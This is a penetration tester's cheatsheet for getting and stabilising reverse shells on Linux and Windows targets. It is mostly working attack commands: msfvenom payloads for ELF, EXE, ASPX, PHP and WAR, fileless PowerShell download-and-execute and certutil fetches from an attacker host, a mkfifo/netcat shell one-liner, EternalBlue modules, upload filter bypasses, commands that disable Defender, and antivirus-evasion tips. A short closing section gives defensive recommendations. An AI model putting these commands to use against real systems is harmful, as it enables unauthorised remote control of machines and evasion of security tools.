π‘οΈ Methodology Checklist
- Choose shell type based on available vector and OS
- Linux reverse: bash, python, perl, ruby options
- Windows reverse: PowerShell, msfvenom EXE, Nishang
- Web shells: PHP, ASPX, JSP based on server tech
- Start listener before delivery
- Stabilise shell immediately after catch
- Move to Meterpreter for advanced capability when possible
π― Operational Context
Use when: Need a working reverse shell one-liner fast β cross-reference by available interpreter on target.
Think Dumber First: Check whatβs on the target first: which python python3 perl ruby php nc bash. Match the one-liner to whatβs installed. Donβt spend 20 minutes debugging a Python reverse shell if nc is available.
Skip when: N/A β quick reference document.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
ping [TARGET_IP] | OS fingerprint via TTL (128=Windows, 64=Linux) |
sudo nmap -v -O -sC -sV [TARGET_IP] | Full OS + service detection scan |
use auxiliary/scanner/smb/smb_ms17_010 | Scan for EternalBlue |
msfvenom -l payloads | List all MSFvenom payloads |
msfvenom -p linux/x64/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f elf > shell.elf | Linux ELF stageless reverse shell |
msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f exe > shell.exe | Windows EXE stageless reverse shell |
msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -e x86/shikata_ga_nai -i 10 -f exe > enc.exe | Encoded Windows reverse shell |
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f aspx -o shell.aspx | ASPX reverse shell (IIS) |
msfvenom -p php/reverse_php LHOST=[LHOST] LPORT=[LPORT] -f raw > shell.php | PHP reverse shell |
echo 'GIF89a;' > shell.php && msfvenom -p php/reverse_php LHOST=[LHOST] LPORT=[LPORT] -f raw >> shell.php | PHP + GIF magic bytes bypass |
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f war -o shell.war | WAR file reverse shell (Tomcat) |
sudo python3 -m http.server 80 | Host payloads for delivery |
IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/shell.ps1') | Fileless PS payload delivery |
wget "http://[LHOST]/shell.ps1" -OutFile "shell.ps1"; .\shell.ps1 | Download + execute PS script |
certutil.exe -urlcache -split -f "http://[LHOST]/shell.ps1" C:\Windows\Temp\shell.ps1 | LOLBAS delivery (Certutil) |
Set-MpPreference -DisableRealtimeMonitoring $true | Disable Defender (lab only) |
sudo nc -lvnp [LPORT] | Catch incoming reverse shell |
nc -nv [TARGET_IP] [PORT] | Connect to bind shell |
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -lvnp [LPORT] > /tmp/f | Linux bind shell one-liner |
use exploit/windows/smb/psexec | MSF PsExec (requires admin creds) |
use exploit/windows/smb/ms17_010_psexec | MSF EternalBlue exploit |
curl -X POST -F "file=@shell.aspx;type=image/png" http://[DOMAIN]/upload.php | MIME type spoofing upload |
python3 -c 'import pty; pty.spawn("/bin/bash")' | Step 1: PTY spawn (stabilization) |
stty raw -echo; fg | Step 2: Fix terminal + foreground (local) |
reset; export TERM=xterm | Step 3: Final terminal polish |
stty rows [ROWS] cols [COLS] | Fix terminal dimensions |
perl -e 'exec "/bin/sh";' | Perl interactive shell breakout |
ruby -e 'exec "/bin/sh"' | Ruby interactive shell breakout |
awk 'BEGIN {system("/bin/sh")}' | AWK interactive shell breakout |
find . -exec /bin/sh \; -quit | find binary breakout |
vim -c ':!/bin/sh' | vim breakout |
sudo -l | Check sudo privileges (post-stabilization) |
π¬ Deep Dive & Workflow
Payload Decision Tree
Target is Windows?
βββ IIS running? β ASPX payload (msfvenom -f aspx)
βββ Can deliver EXE? β msfvenom -f exe
βββ PS accessible? β Nishang IEX delivery (fileless)
βββ Authenticated SMB? β MSF psexec
Target is Linux?
βββ Web app with file upload? β PHP web shell
βββ Can run binary? β msfvenom -f elf
βββ Bash accessible? β mkfifo nc reverse shell
βββ MSF module exists? β use exploit/linux/http/...
Shell Stabilization Quick Reference
python3 -c 'import pty; pty.spawn("/bin/bash")'
[Ctrl+Z]
stty raw -echo; fg
reset
export TERM=xtermAV Evasion Priority
- Fileless (IEX) β best; never touches disk
- Encoding (Shikata Ga Nai) β bypasses static scan
- Custom payloads β modify shellcode, avoid known signatures
- LOLBAS delivery β certutil/BITSAdmin for download stage
Key Ports for Reverse Shells
| Port | Reason |
|---|---|
| 443 | HTTPS β almost never blocked |
| 80 | HTTP β usually allowed |
| 53 | DNS β critical infra, rarely filtered |
| 4444 | MSF default β avoid in real engagements |
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Bash one-liner fails | /bin/bash not at /bin/bash | Try /bin/sh instead; locate with which bash sh |
| Python reverse shell gets no TTY | No pty module | Add: import pty; pty.spawn('/bin/bash') after connection established |
| PHP shell not executing | PHP disabled or wrong syntax | Test: php -r 'echo "ok";'; use shell_exec() if exec() disabled |
| PowerShell one-liner too long | Character limit in injection | Base64 encode: powershell -enc [BASE64]; use msfvenom to generate proper encoded payload |
| nc -e not available | BSD netcat installed | Use mkfifo: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc [LHOST] [LPORT] >/tmp/f |
π Reporting Trigger
Finding Title: Interactive Shell Obtained via Reverse Shell One-Liner Impact: Language interpreter-based reverse shells leverage trusted system binaries to establish C2 channel, achieving interactive RCE without requiring file upload or binary execution. Root Cause: Interpreter (Python, PHP, Perl) available on target system with outbound network access and no restriction on socket creation. Recommendation: Restrict interpreter access for service accounts. Implement egress filtering. Monitor for interpreter processes establishing outbound TCP connections. Apply AppArmor/SELinux profiles.